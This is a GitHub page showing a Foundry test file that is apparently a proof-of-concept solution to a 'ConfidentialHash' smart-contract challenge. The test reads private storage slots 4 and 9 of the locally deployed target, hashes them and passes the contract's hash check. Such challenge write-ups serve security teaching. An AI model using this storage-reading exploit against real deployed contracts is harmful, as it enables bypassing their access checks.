-
Notifications
You must be signed in to change notification settings - Fork 115
/
Copy pathconfidentailhash.t.sol
45 lines (34 loc) · 1.42 KB
/
confidentailhash.t.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Test, console} from "forge-std/Test.sol";
import {ConfidentialHash} from "../../src/confidential-hash/confidentialhash.sol";
interface ITarget {
function checkthehash(bytes32 _hash) external view returns (bool);
}
contract ConfidentialHashPoC is Test {
address targetAddress; // 目标合约地址
constructor() {
bytes memory bytecode = abi.encodePacked(
vm.getCode("ConfidentialHash.sol:ConfidentialHash")
);
address deployedAddress;
assembly {
deployedAddress := create(0, add(bytecode, 0x20), mload(bytecode))
}
require(deployedAddress != address(0), "Deployment failed");
targetAddress = deployedAddress;
console.log("Deployed address: %s", deployedAddress);
}
function testExploit() public {
// 读取存储槽
bytes32 aliceHash = vm.load(targetAddress, bytes32(uint256(4))); // aliceHash 存储在槽 4
bytes32 bobHash = vm.load(targetAddress, bytes32(uint256(9))); // bobHash 存储在槽 9
// 计算 keccak256 哈希值
bytes32 combinedHash = keccak256(abi.encodePacked(aliceHash, bobHash));
// 打印结果
emit log_bytes32(aliceHash);
emit log_bytes32(bobHash);
emit log_bytes32(combinedHash);
assertEq(ITarget(targetAddress).checkthehash(combinedHash), true);
}
}